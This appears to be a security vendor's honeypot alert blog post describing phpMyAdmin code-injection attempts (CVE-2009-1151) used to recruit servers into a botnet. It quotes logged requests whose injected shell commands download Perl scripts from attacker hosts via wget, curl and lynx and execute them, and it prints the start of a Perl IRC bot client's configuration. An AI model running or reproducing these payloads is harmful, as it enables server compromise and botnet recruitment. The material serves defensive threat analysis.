[Honeypot Alert] phpMyAdmin Code Injection Attacks for Botnet Recruitment
Our web honeypots picked up the following attacks today:
62.149.12.62 - - [21/Feb/2012:04:25:55 -0600] "GET /mysql//config.sample.inc.php?eval=system('echo cd /tmp;wget http://199.115.228.9/vp.txt -O p2.txt;curl -O http://199.115.228.9/vp.txt; mv vp.txt d.txt;lyxn -DUMP http://199.115.228.9/vp.txt >p3.txt;perl d.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 226 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.4"
195.145.156.126 - - [21/Feb/2012:05:42:27 -0600] "GET /mysql/config/config.inc.php?eval=system('echo cd /tmp;wget http://dinte.altervista.org/apache_32.png -O p2.txt;curl -O http://dinte.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://dinte.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 225 "-" "curl/7.18.1 (i686-suse-linux-gnu) libcurl/7.18.1 OpenSSL/0.9.8g zlib/1.2.3 libidn/1.8"
These appear to be follow-up exploit attempts for CVE-2009-1151 which allowed for uploading of PHP code into configuration files.
Botnet Recruitment
These requests are attempting to use various OS level http client utilities (wget, curl and lynx) to download a file from the attacker's site. In both cases, the remote files are perl botnet client scripts.
Example Botnet Client Snippet
#!/usr/bin/perl
my @mast3rs = ("tzepelush","Bunicul");
my @admchan=("#scan");
$servidor='winscp.zapto.org' unless $servidor;
my $xeqt = "?p";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;
my @fakeps = ("/usr/bin/atd");
my @nickname = ("fattys","eliter","vxbot","smufen","dual","lee","carro","frida",
"aVe","kmod","kmod2","uselib","raptor","tmpSH","pwned","w00t","DualDuo","Intel",
"AMDPwr","Geforce","Exploit","vx8m0d","indexs","index","index2","index3","index4",
"xQt1","xQt2","xQt3","xQt4","xQt5","xQt6","xQt7","xQt8","xQt9","xQt10","TeaMrxz",
"De","Der","Det","Var","Kam","Dea","Csa","Fbi","Dea","Narko","Gone","Feber","Tull",
"Tundra","st0rms","fLash","TheLight","Nikko","Nikie","Nikkie","daniel","t0nyandr",
"Europa","Fanta","Caroline","speedline","Perf0rm","indexs","dan","educat","catina",
"bindex","hindex","n0rway","myphp","phpvuln","Alarma","GoScan","oslocity","spette",
"Cascam","vSport","vSmotor","vSteam","vSturbo","Turbost","heeman","andy","loundry",
"ranger","Carbon","TypeR","Nozz","phpforum","Nxgas","NinaGirl","Isit","lama","ouch",
"vTeam","vSpot","vCrew","xeQta","Gourl","Vulnx","Hksurl","Greedy","Mrx","counyjail",
"Spourl","Torshov","Oslos","com_xeqt","mowgli","Asus","com_mrx","MrxTeam","arrest",
"vScrew","beran","stuing","ucutter","readnot","gethelp","curpos","cutext","Busted",
"detda","kanjo","neinei","Carbon","irriter","masa","dev-null","korsett","PerlTeam",
"jada","kanjeg","mutterz","dalenmin","heimdal","Gambler","Deanz","Phreak","Getno",
"Susa","Pils","Pilz","Bilz","Clubz","Clubs","Clubbin","Fights","Kampen","telenor",
"Karss","Gophy","reactor","fileporn","filemp3","filelist","free6","purextc","upc",
"Grandis","Piccaso","Vanda","varburen","Tiesto","Jean","DjEan","MeNe","ThiS","nO",
"drspeed","fuzzy","buzzz","GoScan","Vulned","Gourl","makeconf","sshdconf","ngtno",
"m0rtem","cat0","Fuckyall","Fuckit","Aem","Greedy","Hkss","Sparco","MoMo","Carbon",
"d3nyall","vipz","dualc0rz","twoc0re","gotit","h0lyshit","prtls","rapt0r","Getde",
"Vulnx","d3nyurl","vUlnurl","v0dka","Torshov","turboo","Boost","fasty","fr","getfr",
"datacore","dualcore","Daniel","spurv","byrds","jails","spoot","speels","ml","getd",
"Antivi","nod32","Screwed","alias","mekkka","template","f0rm3","p0ker","Geton","NO",
"Door","Borr","Jaarn","Sporet","Dopa","Hasjen","purxTc","Liquer","Justlink","Asust",
"Duffin","Durrett","Dussault","Dwyer","Eardley","Ebeling","Eckel","Edley","Edner",
"Edward","Eickenhorst","Eliasson","Erdos","Erez","Espinoza","Estes","Etter","Eina",
"Elmendorf","Elmerick","Elvis","Encinas","Enyeart","Eppling","Erbach","Erdman","d0",
"Everett","Fabbris","Fagan","Faioes","Altavista","Flamor","Faris","Farone","f00ln3t",
"Farren","Fasso'","Fates","Feigenbaum","Fejzo","Feldman","Euripides","Enzoo","d00rk",
"Wikii","Wifii","Jvc","s0nny","lekter","herrier","sp0ker","netply","netb0st","Liq",
"comma","julie","sveina","andre","pulsedj","p0ker","j0ker","eFn3t","Liers","xTcno",
"Suite","Incl","Page","Mappe","Oxyd","Infode","Senil","Powers","Langu","m0d","doch",
"Snakes","Ridder","Viking","Vikings","Norman","Norway","German","Info","Biz","Edud",
"Ninjas","Ilness","Teacer","Faceoff","devnull","MoMo","Spoon","Liquid","Goofy","Aj",
"Google","Yahoo","Altavista","Lycos","Sesam","Solno","Googler","ScamNet","w0rmnet",
"puman","Skeidar","Tinemelk","Freia","Tresis","Tbanen","Adenyed","Hulken","Pureice",
"Sperre","Lister","Burbon","burb0ns","Toy0","Proxes","WrxSti","Evo6","Evo7","Evo8",
"wss","bss","natron","kiwis","Reman","SevnUp","Perlpls","Spiid","Govbr","Govmil",
"Wssss","Files","xFiles","Dataw0rm","n3tw0rm","Info","Biz","Orgy","foksy","Reven",
"limbo","mambi","bambi","rummy","IluvPerl","PerlKing","Pokerking","Turboa","Gttt",
"BugScam","BugTraq","Trackqs","Que","Adidas","Umbro","Sportas","Liquid","Forume",
"Deka","Jbl","Adecco","M5R","Tuners","Techno","Sivilen","Baosh","Snuten","Purken",
"aaudi","coupe","netliga","liganet","netbase","NetSnok","Snoknet","Snifnet","libz",
"indexp","jooblaa","mamboo","Binl3n","Cplusplus","p3rls3x","illgoon","de","lime",
"homes","newsr","sindex","findex","shome","php3","eedan","Evens","Everest","kkk2",
"igal","c0lombia","freeme","dupen","d3nmark","s2ed3n","crypt0n","n0dam3n","itch",
"Domino","Tarsan","julie","Anett","Stine","Laura","Croft","Craft","Mrex","jiggy",
"Hemaan","c0nan","c0nmen","ImI","RdR","Ils","Ass","Dildo","Pula","Blow","Sn0rts",
"Aloalo","Nasa","DeaGov","FbiGov","NsaGov","CiaGov","CsiEdu","Hav0rd","djPulse",
"Oslos","Ils","cia","d3a","dea","nsa","nas","ama","kma","Scamurl","vito","xQt",
"info","cpu","pet","pacs","dino","megov","onet","xrm","tisi","parm","cico","jun",
"caos","fred","peace","dude","rox","rock","rokie","bayrn","gees","hval","wolf",
"do","go","ln","st","file","page","pag","pg","lg","lang","lng","srcs","action",
"sml","pod","nvidia","vidia","villa","kake","spat","solo","Cols","kols","kreft",
"lam","fal","dett","drop","snop","true","fake","yes","sir","mae","nmf","vmax","as",
"adio","audo","soren","tvtre","host","unitd","coda","cobra","mans","gmail","gtrs",
"remax","rik","fatig","poor","girls","pow","wop","wok","son","kolsa","royk","asss",
"los","las","angl","dream","fools","phol","phools","d0rk","spon","spalk","kalk",
"email","smtp","pops","imapd","pag","lang","lg","nav","php","spyer","cyp","hardy",
"email","null","mastr","drunk","full","beer","bayer","mage","neve","fist","haist",
"dara","dora","boris","dev","cupra","isgal","Yuri","Geez","Frys","dos","to","emul",
"pwned","kung","kim","lil","fatjo","fatman","fat","joe","does","quat","tres","eu",
"shv5","lrk","lkm","lkmrk","trk5","xt","tqex","itt","full","half","power","sender",
"does","tres","quat","fiat","spon","kvae","liim","papp","ddos","fart","noz","daim",
"liga","tvone","shdw","etcpwd","initd","ftpd","wuspl","proftp","newsd","sockd","lue",
"loma","Domma","hest","heist","tivoli","stud","dust","fust","Flue","nille","kenny",
"koma","loc","inc","incl","src","fokus","ford","chevy","wrc","cpu","cool","srchers",
"inc","incl","dir","file","sdir","mains","login","path","base","cmd","cats","farts",
"fiat","uno","jern","kober","liq","torsk","fisk","laks","hone","hore","buk","noman",
"lim","idem","prince","sveina","kine","kim","allan","hanne","terje","bukken","bruse",
"nu","do","li","faen","tater","doc","loc","pof","ninja","per","pets","sings","doper",
"liq","dop","heroin","dok","page","php3","pop","smtp","data","kilde","foss","lowrdr",
"drvby","viper","snake","dragon","dup","vuln","cat","grep","loop","inetd","proftpd",
"pasive","damp","wals","snoke","snik","poff","phil","pill","dra","drjo","djo","laby",
"rune","alan","britt","brita","stue","stenen","andy","bass","phatt","lover","fresa",
"jvc","jbl","cia","fed","sov","purk","snut","snif","deka","svovel","life","knife","so",
"deka","bos","boss","fres","spett","dusj","kappe","norman","keb0rd","fab","dor","bits",
"kniv","lisa","nina","ole","pat","mtv","charl","smokie","nabo","walk","brks","krad-3",
"dame","lady","bola","biffen","kamm","drev","sprider","spider","iscrem","daddy","pie",
"ono","tima","mytm","motor","vsmot","sport","fart","devs","var","tmp","spol","sture".
"jule","tree","gate","net","rand","perl","line","xqt","mrx","org","asus","sped","yaco",
"hash","hmm","ddos","pwr","nix","linux","bsd","ppal","aio","mars","bates","daim","da",
"pico","nmap","juge","sone","log","goofy","kars","meter","daim","kul","foksy","hyena",
"beta","pulse","driver","org","fos","kars","kma","fua","all","tea","foks","lady","fa",
"testo","bola","bolen","card","cards","chip","chips","wv","audi","bmw","roys","bechs",
"nokia","mrx","some","candy","goo","cool","scam","scan","google","lee","cam","li","dm",
"loff","grov","abcd","pulse","grow","alrt","spyd","trojan","maxd","xeqtd","xQtd","nodz",
"owner","crime","data","need","doper","hash","mysql","imapd","devil","shark","byn","ju");
my @xident = ("winscp");
my @xname = (`uname -a`);
ABOUT TRUSTWAVE
Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.